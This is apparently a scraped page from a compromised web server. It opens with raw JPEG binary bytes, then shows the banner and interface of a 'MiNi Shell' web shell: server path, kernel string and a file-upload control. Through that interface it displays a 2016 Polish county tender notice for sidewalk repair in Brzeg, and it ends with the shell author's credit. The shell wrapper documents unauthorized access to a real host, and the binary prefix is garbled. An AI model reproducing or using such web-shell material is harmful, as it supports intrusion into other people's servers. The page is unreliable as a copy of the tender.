JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160429/108732-N-2016.html

<p class="kh_header"><b>Brzeg: REMONT CHODNIKA W CIĄGU DRÓG 
             POWIATOWYCH NR 1193 O I 2025 O                         
             UL.PIASTOWSKA W BRZEGU</b><br>
<b>Numer ogłoszenia: 108732 - 2016; data zamieszczenia: 29.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Brzegu , ul. Wyszyńskiego 23, 49-300 Brzeg, woj. opolskie, tel. 077 4113840, faks 077 4113845.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zdpbrzeg.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT CHODNIKA W CIĄGU DRÓG 
             POWIATOWYCH NR 1193 O I 2025 O                         
             UL.PIASTOWSKA W BRZEGU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie remontu chodnika w ul. Piastowskiej 
               w Brzegu w ciągu dróg powiatowych Nr 1193 O i 2025 O  w strefie A
               ścisłej ochrony konserwatorskiej na długości 450,0 m i średniej szerokości 4,0 m 
               łącznie ze zjazdami o zmiennej szerokości i długości z materiału odzyskanego 
               z rozbiórki z miejscowym uzupełnieniem braków.
               Roboty obejmują  wykonanie remontu chodnika na odcinku od skrzyż. z ul.      
               Jana Pawła II  do skrzyż. z ul. B. Chrobrego w następującym układzie  
               pasowym: 
               1)kostka bazaltowa/płyta granitowa/kostka bazaltowa/pas zieleni
               2)kostka bazaltowa/płyta granitowa /kostka bazaltowa    
               Płyty kamienne pochodzące z rozbiórki przed ponownym wbudowaniem muszą 
               być kątowo docięte z czterech stron oraz górna powierzchnia płyty  
               płomieniowana.
               Nadzór nad pracami będzie prowadzony z udziałem Głównego Specjalisty 
               ds. Ochrony Zabytków Starostwa Powiatowego w Brzegu.
    Szczegółowy zakres robót związany z realizacją  robót zawarty jest, przedmiarze 
              robót, kosztorysie ofertowym, w dokumentacji  projektowej specyfikacjach 
              technicznych wykonania i odbioru robót  - stanowiących załączniki do siwz.   
              Podane w przedmiarze robót podstawy wyceny mają charakter poglądowy
              i  pomocniczy nie stanowią podstawy wyceny przedmiotu zamówienia.
    Zgodnie z art.30 ust.4 ustawy Pzp Zamawiający dopuszcza rozwiązania równoważne 
              opisywanym w dokumentacji projektowej i pozostałych załącznikach do siwz pod 
              warunkiem że oferowane materiały lub rozwiązania równoważne zagwarantują 
              realizację robót i uzyskanie   parametrów technicznych nie gorszych od założonych
              w dokumentach przetargowych.
              Wykonawca, który powołuje się na rozwiązania równoważne z opisywanym przez 
               Zamawiającego jest obowiązany wykazać, że oferowane przez  niego roboty 
               budowlane spełniają wymagania określone przez   Zamawiającego(art.30 ust.5 
              ustawy Pzp).
     Wynagrodzenie Wykonawcy ustalone na podstawie oferty jest wynagrodzeniem
               kosztorysowym i ma charakter wstępny. Wykonawca dokonana wyceny oferty
               w oparciu o analizę wszystkich materiałów udostępnianych przez Zamawiającego
               tj. przedmiar robót , dokumentację projektową, STWiORB , obowiązki określone
               przez Zamawiającego uwzględniając w cenach jednostkowych wszystkie koszty 
               związane z realizacją zadania w tym koszty nadzoru branżowego
               teletechnicznego i inne  nie wymienione. 
               Ostateczna wysokość wynagrodzenia ustalona zostanie   na   podstawie dokonanych  
               obmiarów powykonawczych robót sprawdzonych przez Inspektora  Nadzoru
               i zatwierdzonych przez  Zamawiającego przy  zastosowaniu cen jednostkowych 
               zawartych w kosztorysie ofertowym Wykonawcy. 
                Ceny jednostkowe określone  w kosztorysie ofertowym  nie będą podlegały 
                 jakimkolwiek zmianom  w trakcie trwania umowy.              
       W ramach  zamówienia wykonawca zobowiązany jest również do:
                1)opracowania projektu zmiany organizacji ruchu drogowego na czas 
                   prowadzonych robót  zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 
                   23 września 2003r.w sprawie szczegółowych warunków zarządzania ruchem na 
                   drogach oraz wykonywania nadzoru nad  tym zarządzaniem (Dz. U. Nr 177, 
                   poz.1729 z późn. zm.) zatwierdzony przez organ  zarządzający ruchem 
                   na  drogach powiatowych oraz jego utrzymania w trakcie prowadzonych robót 
                   w należytym stanie technicznym i estetycznym, 
                2)wykonania i utrzymania oznakowania w trakcie prowadzonych robót oraz 
                    rozbiórki po  zakończeniu robót,
                 3)przestrzegania przepisów BHP.
       Zaleca się , aby Wykonawcy  dokonali  wizji lokalnej terenu, którego dotyczy 
                zamówienie  oraz zdobył wszelkie informacje niezbędne do przygotowania oferty                         
                i podpisania umowy.
      Utylizacja odpadów. W trakcie wykonywania robót należy przestrzegać Ustawy 
               z dnia 14 grudnia  2012r. o odpadach (Dz. U. z 2013r. poz.21 z późn.zm.).
      Na wykonane roboty Wykonawca udzieli gwarancji  jakości na okres min. 24 m-ce 
               od daty odbioru końcowego. 
               Okres gwarancji stanowi jedno z kryteriów oceny ofert:
               - minimalny wymagany okres gwarancji jakości wynosi 24 m-cy
               - maksymalny deklarowany okres gwarancji  jakości wynosi 60 m-cy.         
               Okres rękojmi  wynosi 36 miesięcy od daty odbioru końcowego.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Dopuszcza się możliwość udzielenia zamówień uzupełniających polegających 
        na powtórzeniu tego samego rodzaju zamówień,  nie więcej niż  50% wartości  
        zamówienia   podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)Wykonawca musi  wykazać, że  posiada doświadczenie polegające 
                                na wykonaniu (zakończeniu) w okresie ostatnich pięciu lat przed 
                                upływem terminu składania ofert, a jeżeli okres prowadzenia działalności 
                                jest krótszy - w tym okresie, co najmniej  2 roboty budowlane     
                                w zakresie budowy, przebudowy, remontu chodnika z materiałów 
                                kamiennych(kostki bazaltowej, kamiennej i płyt kamiennych)
                                w tym każda robota budowlana musi zawierać wykonanie chodnika:
                                -  z kostki kamiennej bazaltowej - min.500 m2,
                                -  z płyt kamiennych - min.200 m2,
                                -  z kostki kamiennej - min.200 m2,
                                o wartości robót brutto nie mniejszej niż 200 000,00 PLN (słownie:  
                                dwieście tysięcy  złotych 00/100) każda, 
                                przy czym jedna z wykonanych robót winna być zrealizowana
                               w obrębie zabytkowego układu urbanistycznego miasta  wpisanego 
                               do rejestru zabytków,
                               wraz z potwierdzeniem, że roboty te zostały wykonane należycie
                           2)jeżeli wykonawca będzie wykazywał  poleganie na doświadczeniu 
                              innego podmiotu z art.26 ust.2b ustawy Pzp - to musi wykazać 
                              min. 2 roboty budowlane  jak  w § 5.2.1. pkt.1  siwz   
                          Zamawiający dokona oceny spełniania  tego warunku na podstawie  
                          złożonych oświadczeń, dokumentów  na zasadzie  spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny warunku :
                             warunek zostanie uznany za spełniony, gdy Wykonawca wykaże, że 
                             dysponuje lub będzie dysponował min.1 osobą pełniąca funkcje 
                             kierownika robót w specjalności drogowej z min. 5  letnim 
                             doświadczeniem na tym stanowisku od uzyskania uprawnień i złoży 
                             stosowne oświadczenie, że osoba ta posiada wymagane uprawnienia
                             o specjalności drogowej, lub złoży pisemne zobowiązanie innego podmiotu 
                             do udostępnienia ww. osoby na okres korzystania z nich przy wykonywania 
                             zamówienia 

                            Zamawiający dokona oceny spełniania  tego warunku na podstawie  
                            złożonych oświadczeń, dokumentów  na zasadzie  spełnia ,nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)Wykonawca musi wykazać, że posiada opłaconą polisę ubezpieczeniową, 
                               a w przypadku jej braku inny dokument potwierdzający, że wykonawca   
                               jest ubezpieczony  od odpowiedzialności cywilnej na łączną kwotę nie 
                               niższą niż   500 000,00 zł, (słownie: pięćset tysięcy złotych  00/100)  
                               w zakresie prowadzonej działalności związanej z przedmiotem 
                               zamówienia.
                             
                            Zamawiający dokona oceny spełniania  tego warunku na podstawie  
                            złożonych oświadczeń, dokumentów  na zasadzie  spełnia nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)OFERTA - wg załączonego wzoru do wypełnienia - zał. nr 1,
          2)KOSZTORYS OFERTOWY - wg załączonego wzoru do wypełnienia- zał. nr 2,
          3)zaakceptowany WZÓR  UMOWY - zał. nr 3,
          4)zaakceptowana KARTA GWARANCYJNA- zał. nr 4,
          5)oświadczenie nr 4 - zał. Nr 11
          6)druk  dotyczący podwykonawstwa zał. nr  12,
          7)pełnomocnictwo do podpisywania oferty,reprezentacji o ile prawo do podpisywania, 
             reprezentacji nie wynika z innych dokumentów,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - okres gwarancji jakości - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Termin wykonania przedmiotu umowy może ulec odpowiedniemu przedłużeniu o okres, w którym roboty
    nie będą mogły być wykonywane z powodu :
    - niekorzystnych warunków atmosferycznych  uniemożliwiających prawidłowe wykonanie tych   
      robót, gdy to wynika z technologii ich wykonania,
- działania siły wyższej (np. klęski żywiołowej, powódź), mające bezpośredni wpływ na      
  terminowość  wykonywania robót,
- wystąpienia robót dodatkowych, zamiennych,
- wstrzymaniem robót z przyczyn niezależnych od Wykonawcy przez uprawniony organ,
- wystąpienia innych przyczyn niezależnych od Wykonawcy mających wpływ na realizację robót.
Przedłużenie terminu wykonania umowy w przypadku wystąpienia ww. okoliczności nastąpi na podstawie pisemnego aneksu do umowy, sporządzonego na pisemny  
    umotywowany  wniosek Wykonawcy, po zaakceptowaniu go przez Inspektora Nadzoru z ramienia
    Zamawiającego.
Wynagrodzenie  ma charakter  wynagrodzenia kosztorysowego i zostało  
    wyliczone w oparciu o kosztorys ofertowy, dokumentację projektową, wytycznych STWiOR  
    z uwględnieniem wszystkich dodatkowych kosztów jakie musi ponieść Wykonawca w trakcie 
    realizacji przedmiotu umowy w tym m.in. :kosztów oznakowania i  zabepieczenia robót posesji, 
    nadzoru teletechnicznego.
Ostateczna  wysokość  wynagrodzenia   ustalona   zostanie   na   podstawie dokonanych  obmiarów 
    powykonawczych robót  sprawdzonych przez Inspektora  Nadzoru i zatwierdzonych przez   
    Zamawiającego przy zastosowaniu cen jednostkowych zawartych w kosztorysie ofertowym   
    Wykonawcy . 
 W przypadku zmiany przez władzę ustawodawczą określonej procentowej stawki podatku 
    VAT , kwota brutto wynagrodzenia zostanie aneksem do niniejszej umowy odpowiednio   
    dostosowana.
 W przypadku, gdyby wynagrodzenie Wykonawcy miało przekroczyć  kwotę określoną w umowie    Strony mogą dokonać zmiany tej kwoty w drodze aneksu do umowy.
W przypadku stwierdzenia konieczności wykonania robót dodatkowych lub zamiennych, gdy ich  
    wykonanie będzie niezbędne do prawidłowego - zgodnego z zasadami wiedzy technicznej,  
    obowiązującymi przepisami i normami wykonania przedmiotu umowy 
    Wykonawca poinformuje Zamawiającego w terminie 3 dni od powzięcia informacji o potrzebie  
    ich wykonania w formie protokołu konieczności potwierdzonego przez  Inspektora Nadzoru,  
    Głównego Księgowego i zatwierdzonego przez Zamawiającego dołączając kosztorys ofertowy 
    na roboty dodatkowe lub zamienne sporządzony na podstawie cen jednostkowych z kosztorysu       
    ofertowego stanowiący załącznik do niniejszej umowy . 
Bez  zatwierdzenia przez Zamawiającego protokołu konieczności Wykonawca nie może   
    rozpocząć robót  dodatkowych, zamiennych ani ograniczyć zakresu rzeczowego robót.
 W przypadku wystąpienia składników kalkulacyjnych innych niż występują w kosztorysie 
     ofertowym, należy te składniki wycenić z zachowaniem cen czynników produkcji i narzutów 
     podanych w ofercie.
W przypadku braku takich cen należy te składniki wycenić wg średnich cen z SEKONCENBUD
     za ostatni kwartał poprzedzający sporządzenie kosztorysu ofertowego na roboty dodatkowe lub 
     zamienne przy zachowaniu narzutów z kosztorysu ofertowego  oraz nakładów rzeczowych 
     określonych w Katalogach Nakładów Rzeczowych(KNR), a w przypadku braku określenia robót
     w KNR, wg innych ogólnie stosowanych katalogów nakładów własnych zaakceptowanych
     przez Zamawiającego.  
Zamawiający dopuszcza również ograniczenie zakresu rzeczowego przedmiotu umowy,gdy  
     ich wykonanie okaże się zbędne tzw. roboty zaniechane. 

 Zmiana umowy nastąpi również w przypadku wystąpienia wnioskiem do Zamawiającego o wyrażenie zgody na powierzenie 
                Podwykonawcy części zamówienia, pomimo zobowiązania w ofercie wykonania
                zamówienia bez podwykonawców za zgodą zamawiającego na podstawie aneksu do umowy .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zdpbrzeg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Brzegu ul. Wyszyńskiego 23 49-300 Brzeg pokój 25.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2016 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Brzegu ul. Wyszyńskiego 23 49-300 Brzeg pokój 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com